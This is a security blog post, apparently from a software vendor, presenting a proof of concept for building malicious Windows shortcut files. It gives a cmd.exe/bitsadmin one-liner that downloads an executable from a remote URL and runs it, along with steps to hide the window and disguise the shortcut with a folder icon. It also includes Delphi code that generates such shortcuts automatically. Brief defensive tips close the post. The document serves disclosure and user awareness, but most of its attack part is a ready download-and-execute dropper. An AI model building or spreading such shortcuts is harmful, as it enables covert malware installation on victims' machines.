Shortcuts as entry points for malware (PoC)

December 21,2016

Our security researcher and Lead Developer (@DarkCoderSc) came across a way of installing malware threats in a Microsoft Windows Operating System using the well-known Shortcut System that nearly everybody uses and blindly trusts.

Because of it's very nature, it is quite hard to detect. Removal might even be more difficult.

Preface

Description

To describe this threat, we shall first describe a native Windows program, called BITSAdmin Tool and which is embedded in Windows since Windows XP SP2. Follow this MSDN link for more information about how to use it and what it is used for.



Basically, this command line tool was designed to create download tasks and to monitor their progress. Offering such command line is very dangerous since Bitsadmin.exe is of course signed by Microsoft and and approved by other antivirus software, and can be used in a single command line.


Example of BITSAdmin command:


bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe

Now let’s use this command line tool to exploit a new Windows Shortcut.

DIY, the manual way


Right click somewhere in your explorer (for example a free space on your desktop), then click 'Create a new shortcut'



Enter the following command line :

cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"



Then save it.

Now right click on shortcut, then select Properties.



Switch the 'Run' option to 'Run Minimized'



Finally update the icon with your favorite one (for example a folder icon)
To keep the icon when you share the shortcut, it is recommended to keep shell32.dll as target for icons (since shell32.dll is natively available in any Windows System).


Note: Not only shell32.dll contains icons in a Microsoft System: Ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll etc. also have many useful icons.





Your malicious shortcut is now ready.

DIY, programmatically (Delphi)



uses ActiveX, ShlObj, ComObj;

function MaliciousLnk(fileUrl, destFile : String) : Boolean;
var cObject   : IUnknown;
    shellLink : IShellLink;
    PFile     : IPersistFile;

    LinkName  : string;
    Cmd       : String;
begin
  result := false;
  CoInitialize(nil);
  try
    cObject := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile := cObject as IPersistFile;

    Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileURL + '" %temp%\tmp.exe & %temp%\tmp.exe"';

    shellLink.SetDescription('www.phrozensoft.com');
    shellLink.SetPath('cmd.exe');
    shellLink.SetArguments(PWideChar(cmd));
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
    shellLink.SetWorkingDirectory('%windir%\system32\');
    shellLink.SetIconLocation('shell32.dll', 1);

    result := PFile.Save(PWideChar(destFile), false) = S_OK;
  finally
    CoUninitialize();
  end;
end;


Note this technique works since Windows XP SP2 to Windows 10 (latest build) including Windows Server Distributions.
Using this method, a hacker doesn’t even need to create a code to download malware to evade antivirus detection. No binary executable file has to be used!


bitsadmin.exe is just an example of what you can do using Windows shortcut, basically you can do any possible malicious things you could do through command lines like:


Note: For regular Windows users who don’t need to use PowerShell (by default enabled), we recommend to uninstall the package. This would mitigate all malware that exploits PowerShell to install malicious codes.


Do as follow to uninstall the PowerShell package (could be revert at any time)


Go to Program and Features utility (Native Windows Uninstaller Window) and click on Turn Windows features on or off



Scroll down to the PowerShell list item, then uncheck the checkbox



After a reboot, PowerShell package should be uninstalled from your system.

Conclusion


Never blindly trust shortcuts you encounter. They might hide the presence of a malicious code which can be undetected by your favourite antivirus software. The end result might even be a compromised or locked system.
Take the time to open the properties of an unknown shortcut and see which command line it would try to execute.
If you have any doubt, remove it!

Comments